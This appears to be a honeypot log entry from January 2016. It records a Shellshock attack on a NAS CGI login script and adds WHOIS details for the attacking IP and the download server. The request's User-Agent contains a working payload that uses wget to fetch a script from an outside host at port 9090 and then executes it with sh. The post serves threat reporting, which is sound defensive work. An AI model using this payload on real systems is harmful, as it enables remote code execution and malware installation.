Wednesday, 13 January 2016

83.54.165.57 - Shellshock wget via http://192.192.78.216:9090

BEGIN OF HTTP DATA:
2016-01-13 08:48:44
Source IP: 83.54.165.57
GET /cgi-bin/authLogin.cgi HTTP/1.1
Host: 127.0.0.1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0.php && /bin/mkdir -p /share/HDB_DATA/.../ && /usr/bin/wget -c http://192.192.78.216:9090/gH/S0.php -O /tmp/S0.sh  && /bin/sh /tmp/S0.sh 0<&1 2>&1

83.54.165[.]57

    Whois Data (TeamCymru)
  • AS : 3352
  • IP : 83.54.165.57
  • BGP Prefix : 83.54.0.0/16
  • CC : ES
  • Registry : ripencc
  • Allocated : 2004-10-07
  • AS Name: TELEFONICA_DE_ESPANA TELEFONICA DE ESPANA,ES
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois
    Dynamic Source: SANS Internet Storm Cast
  • comment:IP is listed on SANS ISC
  • Reference: https://isc.sans.edu/api/ip/83.54.165.57

192.192.78[.]216

    Whois Data (TeamCymru)
  • AS : 1659
  • IP : 192.192.78.216
  • BGP Prefix : 192.192.0.0/16
  • CC : TW
  • Registry : apnic
  • Allocated :
  • AS Name: ERX-TANET-ASN1 Taiwan Academic Network (TANet) Information Center,TW
  • http://www.team-cymru.org/IP-ASN-mapping.html#whois